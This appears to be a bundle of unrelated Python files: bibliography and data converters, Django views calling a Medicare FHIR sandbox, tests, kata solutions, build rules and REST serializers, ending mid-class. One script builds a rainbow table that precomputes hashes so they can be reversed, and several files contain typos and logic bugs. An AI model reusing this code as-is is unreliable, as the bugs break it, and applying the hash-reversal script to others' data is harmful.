__all__ = ['ExpandedWeight']
|
import os
import sys
import re
import _bibtex
f = _bibtex.open_file(sys.argv[1], True)
l = []
while 1:
entry = _bibtex.next_unfiltered(f)
if entry is None:
break
if entry[0] != 'entry':
# skip
continue
l.append(entry)
pubs = ""
for entry in l:
name = entry[1][0]
entry = entry[1][4]
pubs += '- name: %s\n' % name
# author
assert 'author' in entry
data = _bibtex.expand(f, entry['author'], -1)[2].strip()
pubs += " authors: \"%s\"\n" % data
# title
assert 'title' in entry
data = _bibtex.expand(f, entry['title'], -1)[2].strip()
pubs += " title: \"%s\"\n" % data
# booktitle
if 'booktitle' in entry:
data = _bibtex.expand(f, entry['booktitle'], -1)[2].strip()
elif 'journal' in entry:
data = _bibtex.expand(f, entry['journal'], -1)[2].strip()
if 'pages' in entry:
pages = _bibtex.expand(f, entry['pages'], -1)[2].strip()
data += ", Pages %s" % pages
if 'number' in entry:
number = _bibtex.expand(f, entry['number'], -1)[2].strip()
data += ", Number %s" % number
if 'volume' in entry:
volume = _bibtex.expand(f, entry['volume'], -1)[2].strip()
data += ", Volume %s" % volume
elif 'inproceedings' in entry:
data = _bibtex.expand(f, entry['inproceedings'], -1)[2].strip()
else:
assert False
pubs += " venue: \"%s\"\n" % data
# Location
if 'address' in entry:
data = _bibtex.expand(f, entry['address'], -1)[2].strip()
pubs += " address: \"%s\"\n" % data
# date
assert 'year' in entry
yr = _bibtex.expand(f, entry['year'], -1)[2].strip()
if 'month' in entry:
mo = _bibtex.expand(f, entry['month'], -1)[2].strip()
mo += ", "
else:
mo = ""
pubs += " date: \"%s%s\"\n" % (mo, yr)
# File(s) detection
cwd = os.getcwd()
pdf = name.split(":")[0] + ".pdf"
bib = name.split(":")[0] + ".bib"
lec = "lecture_" + name.split(":")[0] + ".pdf"
if os.path.exists(os.path.join(cwd, pdf)):
pubs += " pdf: %s\n" % pdf
if os.path.exists(os.path.join(cwd, bib)):
pubs += " bib: %s\n" % bib
if os.path.exists(os.path.join(cwd, lec)):
pubs += " lec: %s\n" % lec
pubs += "\n"
# some hacks
pubs = pubs.replace("$^st$", "st")
pubs = pubs.replace("$^{st}$", "st")
pubs = pubs.replace("$^nd$", "nd")
pubs = pubs.replace("$^rd$", "rd")
pubs = pubs.replace("$^th$", "th")
pubs = pubs.replace("$^{th}$", "th")
pubs = pubs.replace("&", "&")
print pubs
|
from __future__ import absolute_import
from __future__ import unicode_literals
import json
import logging
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from collections import OrderedDict
import requests
from requests_oauthlib import OAuth2
__author__ = "Alan Viars"
def build_fhir_urls(patient_id=None, since_date=None):
result = {}
base = getattr( settings, 'FHIR_BASE_ENDPOINT',
"https://sandbox.bluebutton.cms.gov/v1/fhir/")
eob_search = urljoin(base, "ExplanationOfBenefit/")
result['eob_search'] = eob_search
patient_search = urljoin(base, "Patient/")
result['patient_search'] = patient_search
if patient_id:
result['coverage'] = urljoin(base, "Coverage/?beneficiary=%s" % (patient_id))
result['eob'] = urljoin(base, "ExplanationOfBenefit/?patient=%s" % (patient_id))
result['patient'] = urljoin(base, "Patient/%s" % (patient_id))
return result
@login_required
def bbof_get_userinfo(request):
context = {'name': 'Get Userinfo'}
url = getattr( settings, 'USER_INFO_ENDPOINT',
"https://sandbox.bluebutton.cms.gov/v1/connect/userinfo")
token = request.user.social_auth.get(provider='oauth2io').access_token
auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
token={'access_token': token, 'token_type': 'Bearer'})
response = requests.get(url, auth=auth)
if response.status_code in (200, 404):
if response.json():
content = json.dumps(response.json(), indent=4)
else:
content = {'error': 'problem reading content.'}
elif response.status_code == 403:
content = {'error': 'No read capability'}
content = response.content
else:
content = response.content
context['remote_status_code'] = response.status_code
context['remote_content'] = content
context['url'] = url
return render(request, 'bbof.html', context)
@login_required
def bbof_get_patient(request, patient_id=None):
context = {'name': 'Blue Button on FHIR'}
urls = build_fhir_urls(patient_id)
# first we get the token used to login
token = request.user.social_auth.get(provider='oauth2io').access_token
auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
token={'access_token': token, 'token_type': 'Bearer'})
# next we call the remote api
url = urls['patient']
logging.debug("calling FHIR Service with %s" % url)
response = requests.get(url, auth=auth)
if response.status_code in (200, 404):
if response.json():
content = json.dumps(response.json(), indent=4)
else:
content = {'error': 'problem reading content.'}
elif response.status_code == 403:
content = {'error': 'No read capability'}
content = response.content
else:
content = response.content
context['remote_status_code'] = response.status_code
context['remote_content'] = content
context['url'] = url
context['pqtient'] = patient_id
return render(request, 'bbof.html', context)
@login_required
def bbof_get_eob(request, patient_id=None):
context = {'name': 'Blue Button on FHIR'}
# first we get the token used to login
token = request.user.social_auth.get(provider='oauth2io').access_token
auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
token={'access_token': token, 'token_type': 'Bearer'})
urls = build_fhir_urls(patient_id)
response = requests.get(urls['eob'], auth=auth)
if response.status_code in (200, 404):
if response.json():
content = json.dumps(response.json(), indent=4)
else:
content = {'error': 'problem reading content.'}
elif response.status_code == 403:
content = {'error': 'No read capability'}
content = response.content
else:
content = response.json()
# print(content)
context['remote_status_code'] = response.status_code
context['remote_content'] = content
return render(request, 'bbof.html', context)
@login_required
def bbof_get_coverage(request, patient_id=None):
context = {'name': 'Blue Button on FHIR'}
# first we get the token used to login
token = request.user.social_auth.get(provider='oauth2io').access_token
auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
token={'access_token': token, 'token_type': 'Bearer'})
urls = build_fhir_urls(patient_id)
response = requests.get(urls['coverage'], auth=auth)
if response.status_code in (200, 404):
if response.json():
content = json.dumps(response.json(), indent=4)
else:
content = {'error': 'problem reading content.'}
elif response.status_code == 403:
content = {'error': 'No read capability'}
content = response.content
else:
content = response.json()
context['remote_status_code'] = response.status_code
context['remote_content'] = content
return render(request, 'bbof.html', context)
@login_required
def bbof_get_fhir(request, resource_type, patient):
context = {'name': 'Blue Button on FHIR'}
# first we get the token used to login
token = request.user.social_auth.get(provider='oauth2io').access_token
auth = OAuth2(settings.SOCIAL_AUTH_OAUTH2IO_KEY,
token={'access_token': token, 'token_type': 'Bearer'})
# next we call the remote api
endpoint = '/v1/fhir/%s/?%s=59b99cd030c49e0001481f44&_format=json' % (
resource_type, patient)
url = urljoin(
getattr(
settings,
'OAUTH2IO_HOST',
"https://sandbox.bluebutton.cms.gov"), endpoint)
print(url)
# % (request.user.username)
logging.debug("calling FHIR Service with %s" % url)
response = requests.get(url, auth=auth)
if response.status_code in (200, 404):
if response.json():
content = json.dumps(response.json(), indent=4)
else:
content = {'error': 'problem reading content.'}
elif response.status_code == 403:
content = {'error': 'No read capability'}
content = response.content
elif response.status_code <= 500:
content = {'error': '500 Error from the server.',
'status_code': response.status_code }
content = response.content
else:
content = response.content
context['remote_status_code'] = response.status_code
context['remote_content'] = content
ontext['patient'] = patient
return render(request, 'bbof.html', context)
|
from functools import reduce
from rnnr import Event
from rnnr.attachments import LambdaReducer
def test_ok(runner):
outputs = [4, 2, 1, 5, 6]
batches = range(len(outputs))
@runner.on(Event.BATCH)
def on_batch(state):
state["output"] = outputs[state["batch"]]
r = LambdaReducer("product", lambda x, y: x * y)
r.attach_on(runner)
runner.run(batches)
assert r.name == "product"
assert runner.state["product"] == reduce(lambda x, y: x * y, outputs)
def test_value(runner):
outputs = [4, 2, 1, 5, 6]
batches = range(len(outputs))
@runner.on(Event.BATCH)
def on_batch(state):
state["value"] = outputs[state["batch"]]
r = LambdaReducer("product", lambda x, y: x * y, value="value")
r.attach_on(runner)
runner.run(batches)
assert runner.state["product"] == reduce(lambda x, y: x * y, outputs)
|
"""
Your task is to find the first element of an array that is not consecutive.
By not consecutive we mean not exactly 1 larger than the previous element of the array.
E.g. If we have an array [1,2,3,4,6,7,8] then 1 then 2 then 3 then 4 are all consecutive but 6 is not, so that's the first non-consecutive number.
If the whole array is consecutive then return None.
The array will always have at least 2 elements and all elements will be numbers.
The numbers will also all be unique and in ascending order.
The numbers could be positive or negative and the first non-consecutive could be either too!
"""
def first_non_consecutive(arr):
for index, item in enumerate(arr):
if arr.index(arr[index]) == len(arr) - 1:
break
if arr[index + 1] - arr[index] > 1:
return arr[index + 1]
return None
|
import apsw
from time import time
from itertools import product
from CONFIGURATION import *
from hasher import *
letter = "abcdefghijklmnopqrstuvwxyz "
print("\nCreating New Rainbow Table\n\nEnter Security Code:")
securecode = input()
memdb = apsw.Connection(":memory:")
memdbc = memdb.cursor()
memdbc.execute("CREATE TABLE IF NOT EXISTS tb (hash text, value text)")
print("\n\n\nStaring now.\n\n")
starttime = time()
print("[1/3] Creating Rainbowtable")
rainbowtable = [''.join(i) for i in product(letter, repeat = blobsize)]
print("[1/3] Done Creating Rainbowtable")
print("[2/3] Hashing")
starttimeblob = time()
for i in rainbowtable[:100000]:
memdbc.execute('INSERT INTO tb VALUES (?,?)', (hash(i+securecode),i))
endtimeblob = time()
timeusedblob = endtimeblob-starttimeblob
print("Estemated Solve Time: " + str(round(timeusedblob/100000*(pow(len(letter),blobsize)))) + " seconds")
for i in rainbowtable[100000:]:
memdbc.execute('INSERT INTO tb VALUES (?,?)', (hash(i+securecode),i))
print("[2/3] Hashing Done")
print("[3/3] Exporting to file")
diskdb = apsw.Connection(securecode + ".db")
with diskdb.backup("main", memdb, "main") as backup:
backup.step() # copy whole database in one go
print("[3/3] Exported")
memdbc.close()
memdb.close()
endtime = time()
timeused = endtime-starttime
totalhashes = pow(len(letter),blobsize)
# Display Result
print("\n\n\n\n\n\n--------------------------------------------")
print("Procces Completed")
print("Hashes Calcuated: " + str(totalhashes))
print("Speed: " + str(round(totalhashes/timeused)) + " per second")
if timeused>60:
if timeused>3600:
print("Time: " + str(round((timeused/3600),2)) + " hours")
else:
print("Time: " + str(round((timeused/60),2)) + " min")
else:
print("Time: " + str(round((timeused), 4)) + " sec")
print("--------------------------------------------\n\n\n")
|
"""
The yelp dataset *business.json file has lat and long as a separate keys, however MongoDB wants
them to be under the same key to create a 2D index
The data generated here can be imported as:
mongoimport --db yelpdata --collection business --jsonArray --file out.json
"""
import json
def main(f, o):
"""
fix JSON input 'f' and save it as a JSON Array to output file 'o'
:param f: input file path as a string
:param o: output file path as a string
:return: None
"""
with open(f) as f:
l = f.read().splitlines()
res = []
out = open(o, 'w')
for line in l:
j = json.loads(line)
d = {}
d['_id'] = j['business_id']
d['name'] = j['name']
d['loc'] = [j['longitude'], j['latitude']]
d['stars'] = j['stars']
res.append(json.dumps(d))
out.write('[' + ',\n'.join(res) + ']')
out.close()
if __name__ == '__main__':
main('./yelp_academic_dataset_business.json', './out.json')
|
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
# pool2d paddle model generator
#
import numpy as np
from save_model import saveModel
import sys
def paddle_dropout(name : str, x, p, paddle_attrs):
import paddle
paddle.enable_static()
with paddle.static.program_guard(paddle.static.Program(), paddle.static.Program()):
node_x = paddle.static.data(name='x', shape=x.shape, dtype='float32')
out = paddle.nn.functional.dropout(x=node_x, p=p, training=paddle_attrs['training'], mode=paddle_attrs['mode'])
cpu = paddle.static.cpu_places(1)
exe = paddle.static.Executor(cpu[0])
# startup program will call initializer to initialize the parameters.
exe.run(paddle.static.default_startup_program())
outs = exe.run(
feed={'x': x},
fetch_list=[out])
saveModel(name, exe, feedkeys=['x'], fetchlist=[out], inputs=[x],
outputs=[outs[0]], target_dir=sys.argv[1])
return outs[0]
def main():
p=0.5
data = np.random.random(size=(3, 10, 3, 7)).astype('float32')
paddle_attrs = {
'training' : False,
'mode' : "downscale_in_infer"
}
paddle_attrs2 = {
'training' : False,
'mode' : "upscale_in_train"
}
paddle_dropout("dropout", data, p, paddle_attrs)
paddle_dropout("dropout_upscale_in_train", data, p, paddle_attrs2)
if __name__ == "__main__":
main() |
# $Id$
#
# @rocks@
# Copyright (c) 2000 - 2010 The Regents of the University of California
# All rights reserved. Rocks(r) v5.4 www.rocksclusters.org
# https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt
# @rocks@
#
# $Log$
# Revision 1.4 2010/09/07 23:52:54 bruno
# star power for gb
#
# Revision 1.3 2010/05/20 00:31:45 bruno
# gonna get some serious 'star power' off this commit.
#
# put in code to dynamically configure the static-routes file based on
# networks (no longer the hardcoded 'eth0').
#
# Revision 1.2 2009/05/01 19:06:57 mjk
# chimi con queso
#
# Revision 1.1 2009/03/13 20:34:19 mjk
# - added list.appliance.route
# - added list.os.route
#
import stack.commands
class Command(stack.commands.list.appliance.command):
"""
List the routes for a given appliance type.
<arg optional='1' type='string' name='appliance' repeat='1'>
Zero, one or more appliance names. If no appliance names are supplied,
the routes for all the appliances are listed.
</arg>
"""
def run(self, params, args):
self.beginOutput()
for app in self.getApplianceNames(args):
routes = self.db.select("""r.network, r.netmask, r.gateway,
r.subnet, r.interface from appliance_routes r, appliances a
where r.appliance=a.id and a.name=%s""", app)
for network, netmask, gateway, subnet, interface in routes:
if subnet:
subnet_name = self.db.select("""name from subnets where id=%s""",
[subnet])[0][0]
else:
subnet_name = None
if interface == 'NULL':
interface = None
self.addOutput(app, (network, netmask, gateway, subnet_name, interface))
self.endOutput(header=['appliance', 'network', 'netmask', 'gateway',
'subnet', 'interface' ], trimOwner=0)
|
burger = []
drink = []
a = int(input())
burger.append(a)
b = int(input())
burger.append(b)
c = int(input())
burger.append(c)
d = int(input())
drink.append(d)
e = int(input())
drink.append(e)
burger.sort()
drink.sort()
print(burger[0] + drink[0] - 50)
|
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template("landing_page.html")
@app.route('/ninjas')
def ninjas():
return render_template("ninjas.html")
@app.route('/dojo')
def dojo():
return render_template("dojo.html")
app.run(debug=True) |
# Copyright 2016 The Closure Rules Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for building JavaScript Protocol Buffers.
"""
load("//closure/compiler:closure_js_library.bzl", "closure_js_library")
def _collect_includes(srcs):
includes = ["."]
for src in srcs:
include = ""
if src.startswith("@"):
include = Label(src).workspace_root
if include and not include in includes:
includes += [include]
return includes
def closure_js_proto_library(
name,
srcs,
suppress = [],
add_require_for_enums = 0,
testonly = None,
binary = 1,
import_style = None,
protocbin = Label("@com_google_protobuf//:protoc"),
**kwargs):
cmd = ["$(location %s)" % protocbin]
js_out_options = ["library=%s,error_on_name_conflict" % name]
if add_require_for_enums:
js_out_options += ["add_require_for_enums"]
if testonly:
js_out_options += ["testonly"]
if binary:
js_out_options += ["binary"]
if import_style:
js_out_options += ["import_style=%s" % import_style]
cmd += ["-I%s" % i for i in _collect_includes(srcs)]
cmd += ["--js_out=%s:$(@D)" % ",".join(js_out_options)]
cmd += ["--descriptor_set_out=$(@D)/%s.descriptor" % name]
cmd += ["$(locations " + src + ")" for src in srcs]
native.genrule(
name = name + "_gen",
srcs = srcs,
testonly = testonly,
visibility = ["//visibility:private"],
message = "Generating JavaScript Protocol Buffer file",
outs = [name + ".js", name + ".descriptor"],
tools = [protocbin],
cmd = " ".join(cmd),
)
closure_js_library(
name = name,
srcs = [name + ".js"],
testonly = testonly,
deps = [
str(Label("//closure/library/array")),
str(Label("//closure/protobuf:jspb")),
],
internal_descriptors = [name + ".descriptor"],
suppress = suppress + [
"missingProperties",
"unusedLocalVariables",
],
lenient = True,
**kwargs
)
|
from main.classes.SQLIOHandler import SQLIOHandler
from os import sys
if __name__ == "__main__":
# alphaAPIHTTPHandler = AlphaAPIHTTPHandler("symbols", "SYMBOL")
# alphaAPIHTTPHandler.GenerateJsonSymbolOverviewRepository()
sQLIOHandler = SQLIOHandler()
sQLIOHandler.ProcessAllJsonFilesIntoDatabase()
sys.exit(0)
|
import sys
import matplotlib.pyplot as plt
import numpy as np
training_data_path = '../resources/training_data.txt'
plot_path_g = '../resources/training_data_g.jpg'
plot_path_t = '../resources/training_data_t.jpg'
generations, time_stamps, best_durations, average_durations = np.loadtxt(training_data_path, unpack=True)
plt.title('Training data')
plt.xlabel('generation')
plt.ylabel('duration')
plt.plot(generations, average_durations, label='Average duration', color='k')
plt.plot(generations, best_durations, label='Best duration', color='deepskyblue')
def plot_benchmarks():
# Plot benchmarks if benchmark file specified
if len(sys.argv) > 1:
benchmark_path = f'../resources/benchmark_files/{sys.argv[1]}.res'
with open(benchmark_path, 'r') as f:
best_solution = float(f.readline().strip())
for percentile in [0.0, 0.05, 0.1, 0.2, 0.3]:
generations.fill(best_solution * (1 + percentile))
plt.plot(generations, label=str(percentile))
plot_benchmarks()
plt.legend()
plt.savefig(plot_path_g)
plt.close()
# -------------------------------
plt.title('Training data')
plt.xlabel('time / (s)')
plt.ylabel('duration')
plt.plot(time_stamps, average_durations, label='Average duration', color='k')
plt.plot(time_stamps, best_durations, label='Best duration', color='deepskyblue')
plt.legend()
plt.savefig(plot_path_t)
plt.close() |
from .CheckCase import CheckCase
from .CheckCommandLineArguments import CheckCommandLineArguments
|
from django.db import models
from drf_yasg import openapi
from rest_framework import serializers
SessionParameter = [
openapi.Parameter(
name='Cookie', in_=openapi.IN_HEADER,
type=openapi.TYPE_STRING,
description="Cookie",
required=True,
default=""
),
openapi.Parameter(
name='Cookies', in_=openapi.IN_HEADER,
type=openapi.TYPE_STRING,
description="Cookies",
required=False,
default=""
),
]
class NoneMeta(models.Model):
class Meta:
managed = False
db_table = 'NoneMeta'
class GetConfInfoSerializer(serializers.ModelSerializer):
key_value = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ["key_value"]
class SessionSerializer(serializers.ModelSerializer):
username = serializers.CharField(required=True)
password = serializers.CharField(required=True)
project_name = serializers.CharField(required=True)
project_domain_name = serializers.CharField(required=False)
user_domain_name = serializers.CharField(required=False)
region = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ["username", "password", "project_name", "project_domain_name",
"user_domain_name", 'region']
class ProjectSerializer(serializers.ModelSerializer):
project_name = serializers.CharField(required=True)
domain_name = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['project_name', 'domain_name']
class DeleteProjectSerializer(serializers.ModelSerializer):
project_name = serializers.CharField(required=True)
domain_name = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['project_name', 'domain_name']
class ListProjectSerializer(serializers.ModelSerializer):
domain_name = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['domain_name']
class GetProjectSerializer(serializers.ModelSerializer):
project_name = serializers.CharField(required=True)
domain_name = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['project_name', 'domain_name']
class UpdateProjectSerializer(serializers.ModelSerializer):
project_name = serializers.CharField(required=True)
description = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['project_name', 'description']
class UserSerializer(serializers.ModelSerializer):
name = serializers.CharField(required=True)
password = serializers.CharField(required=True)
email = serializers.CharField(required=True)
default_project = serializers.CharField(required=False)
domain_name = serializers.CharField(required=False)
description = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['name', 'password', 'email',
'default_project', 'domain_name',
'description']
class ListUserSerializer(serializers.ModelSerializer):
project_name = serializers.CharField(required=False)
domain_name = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['project_name', 'domain_name']
class DeleteUserSerializer(serializers.ModelSerializer):
user_name = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['user_name']
class UpdateUserSerializer(serializers.ModelSerializer):
origin_user = serializers.CharField(required=True)
name = serializers.CharField(required=False)
password = serializers.CharField(required=False)
email = serializers.CharField(required=False)
default_project = serializers.CharField(required=False)
domain_id = serializers.CharField(required=False)
description = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['origin_user', 'name', 'email', 'domain_id', 'password',
'description', 'default_project']
class RoleAssignmentSerializer(serializers.ModelSerializer):
user = serializers.CharField(required=True)
project = serializers.CharField(required=True)
role = serializers.CharField(required=False, default='_member_')
domain = serializers.CharField(required=False, default='default')
class Meta:
model = NoneMeta
fields = ['user', 'project', 'role', 'domain']
class InstanceCreateSerializer(serializers.ModelSerializer):
name = serializers.CharField(required=True)
image = serializers.CharField(required=True)
flavor = serializers.CharField(required=True)
network_dict = serializers.DictField(required=True)
class Meta:
model = NoneMeta
fields = ['name', 'image', 'flavor', 'network_dict']
class InstanceStopSerializer(serializers.ModelSerializer):
server_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['server_id']
class InstanceRestartSerializer(serializers.ModelSerializer):
server_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['server_id']
class InstanceStartSerializer(serializers.ModelSerializer):
server_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['server_id']
class InstanceDeleteSerializer(serializers.ModelSerializer):
server_id_list = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['server_id_list']
class InstanceIdSerializer(serializers.ModelSerializer):
server_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['server_id']
class RouterCreateSerializer(serializers.ModelSerializer):
router_name = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['router_name']
class DeleteRouterSerializer(serializers.ModelSerializer):
router_of_name = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['router_of_name']
class CreateFloatingIpSerializer(serializers.ModelSerializer):
contract_number = serializers.CharField(required=False)
region = serializers.CharField(required=True)
external_line_type = serializers.CharField(required=True)
floating_network_id = serializers.CharField(required=True)
qos_policy_id = serializers.CharField(required=True)
count = serializers.IntegerField(required=True)
class Meta:
model = NoneMeta
fields = ["contract_number", "region", "external_line_type", "floating_network_id", "qos_policy_id", "count"]
class DeleteFloatingIpSerializer(serializers.ModelSerializer):
floating_ip_id_list = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['floating_ip_id_list']
class FloatingIpQuotasSetSerializer(serializers.ModelSerializer):
qos_policy_id = serializers.CharField(required=True)
floating_ip_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['qos_policy_id', 'floating_ip_id']
class AddFloatingIptoServerSerializer(serializers.ModelSerializer):
instance_id = serializers.CharField(required=True)
floating_ip_id = serializers.CharField(required=True)
fixed_address = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['instance_id', 'floating_ip_id', "fixed_address"]
class DetachFloatingIptoServerSerializer(serializers.ModelSerializer):
instance_id = serializers.CharField(required=True)
floating_ip_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['instance_id', 'floating_ip_id']
class AddRouterInterfaceSerializer(serializers.ModelSerializer):
router_id = serializers.CharField(required=True)
subnet_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['router_id', 'subnet_id']
class SetRouterGatewaySerializer(serializers.ModelSerializer):
router_id = serializers.CharField(required=True)
external_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['router_id', 'external_id']
class CreateNetworksSerializer(serializers.ModelSerializer):
network_name = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['network_name']
class CreateTenantSubnetSerializer(serializers.ModelSerializer):
tenant_network_name = serializers.CharField(required=True)
tenant_network_cidr = serializers.CharField(required=True)
enable_dhcp_server = serializers.BooleanField(required=True)
gateway = serializers.CharField(required=True)
disable_gateway_ip = serializers.BooleanField(required=True)
subnet_name = serializers.CharField(required=True)
dns_name_server = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['tenant_network_name', 'tenant_network_cidr', 'enable_dhcp_server',
'gateway', 'disable_gateway_ip', 'subnet_name', 'dns_name_server']
class CreateVpcSerializer(serializers.ModelSerializer):
vpc_name = serializers.CharField(required=True)
region = serializers.CharField(required=True)
net_name = serializers.CharField(required=True)
vpc_type = serializers.CharField(required=True)
cidr = serializers.CharField(required=True)
enable_dhcp = serializers.BooleanField(required=False)
gateway_ip = serializers.CharField(required=False)
dns = serializers.ListField(required=False)
class Meta:
model = NoneMeta
fields = ['vpc_name', 'region', 'net_name', 'cidr',
'enable_dhcp', 'gateway_ip', 'dns', 'vpc_type']
class UpdateVpcSerializer(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
name = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['vpc_id', 'name']
class DleleteVpcSerializer(serializers.ModelSerializer):
vpc_ids = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['vpc_ids']
class ListVpcNetworks(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
class Meta:
model = NoneMeta
fields = ['vpc_id']
class AddVpcNetwork(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
net_name = serializers.CharField(required=True)
cidr = serializers.CharField(required=True)
enable_dhcp = serializers.BooleanField(required=False)
gateway_ip = serializers.CharField(required=False)
dns = serializers.ListField(required=False)
class Meta:
model = NoneMeta
fields = ['vpc_id', 'net_name', 'cidr',
'enable_dhcp', 'gateway_ip', 'dns']
class UpdateVpcNetwork(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
net_id = serializers.CharField(required=True)
net_name = serializers.CharField(required=False)
enable_dhcp = serializers.BooleanField(required=False)
dns = serializers.ListField(required=False)
class Meta:
model = NoneMeta
fields = ['vpc_id', 'net_id', 'net_name',
'enable_dhcp', 'dns']
class DeleteVpcNetwork(serializers.ModelSerializer):
vpc_id = serializers.IntegerField(required=True)
net_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['vpc_id', 'net_id']
class KeypairCreate(serializers.ModelSerializer):
name = serializers.CharField(required=True)
public_key = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['name', 'public_key']
class KeypairDelete(serializers.ModelSerializer):
keypair_name_list = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['keypair_name_list']
class ProjectIdSerializer(serializers.ModelSerializer):
project_id = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['project_id']
class FirewallCreate(serializers.ModelSerializer):
name = serializers.CharField(required=True)
enabled = serializers.BooleanField(required=False)
description = serializers.CharField(required=False)
region = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['name', 'enabled', 'description', 'region']
class FirewallRuleListSerializer(serializers.ModelSerializer):
firewall_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['firewall_id']
class FirewallUpdate(serializers.ModelSerializer):
firewall_id = serializers.IntegerField(required=True)
name = serializers.CharField(required=True)
enabled = serializers.BooleanField(required=False)
description = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['firewall_id', 'name', 'enabled',
'description']
class FirewallDelete(serializers.ModelSerializer):
firewalls = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['firewalls']
class FirewallRuleCreate(serializers.ModelSerializer):
firewall_id = serializers.CharField(required=True)
direction = serializers.CharField(required=True)
action = serializers.CharField(required=True)
protocol = serializers.CharField(required=True)
remote_ip = serializers.CharField(required=True)
remote_port = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['firewall_id', 'direction', 'action',
'protocol', 'remote_ip', 'remote_port']
class FirewallRuleUpdate(serializers.ModelSerializer):
firewall_id = serializers.CharField(required=True)
firewall_rule_id = serializers.CharField(required=True)
direction = serializers.CharField(required=False)
action = serializers.CharField(required=False)
protocol = serializers.CharField(required=False)
remote_ip = serializers.CharField(required=False)
remote_port = serializers.CharField(required=False)
class Meta:
model = NoneMeta
fields = ['firewall_id', 'firewall_rule_id', 'direction', 'action',
'protocol', 'remote_ip', 'remote_port']
class FirewallRuleDelete(serializers.ModelSerializer):
firewall_id = serializers.CharField(required=True)
firewall_rule_id = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['firewall_id', 'firewall_rule_id']
class InstanceInterfaceAttachSerializer(serializers.ModelSerializer):
server_id = serializers.CharField(required=True)
net_id = serializers.CharField(required=True)
class Meta:
model = NoneMeta
fields = ['server_id', 'net_id']
class InstanceInterfaceDetachSerializer(serializers.ModelSerializer):
server_id = serializers.CharField(required=True)
port_ids = serializers.ListField(required=True)
class Meta:
model = NoneMeta
fields = ['server_id', 'port_ids']
class CreateLoadBalancersSerializer(serializers.ModelSerializer):
vip_subnet_id = serializers.CharField(required=True)
name = serializers.CharField(required=True)
listeners = serializers.ListField(required=False)
admin_state_up = serializers.BooleanField(required=False)
description = serializers.CharField(required=False)
flavor_id = serializers.UUIDField(required=False)
provider = serializers.CharField(required=False)
tags = serializers.ListField(required=False)
vip_address = serializers.CharField(required=False)
vip_network_id = serializers.UUIDField(required=False)
vip_port_id = serializers.UUIDField(required=False)
vip_qos_policy_id = serializers.UUIDField(required=False)
class Meta:
model = NoneMeta
fields = ['vip_subnet_id', 'name', 'listeners', 'admin_state_up',
'description', 'flavor_id', 'provider', 'tags',
'vip_address', 'vip_network_id', 'vip_port_id', 'vip_qos_policy_id']
class UpdateLoadBalancersSerializer(serializers.ModelSerializer):
admin_state_up = serializers.BooleanField(required=False)
description = serializers.CharField(required=False)
loadbalancer_id = serializers.UUIDField(required=True)
name = serializers.CharField(required=False)
tags = serializers.ListField(required=False)
vip_qos_policy_id = serializers.UUIDField(required=False)
class Meta:
model = NoneMeta
fields = ['admin_state_up', 'description', 'loadbalancer_id', 'name', 'tags', 'vip_qos_policy_id']
class ShowLoadBalancersSerializer(serializers.ModelSerializer):
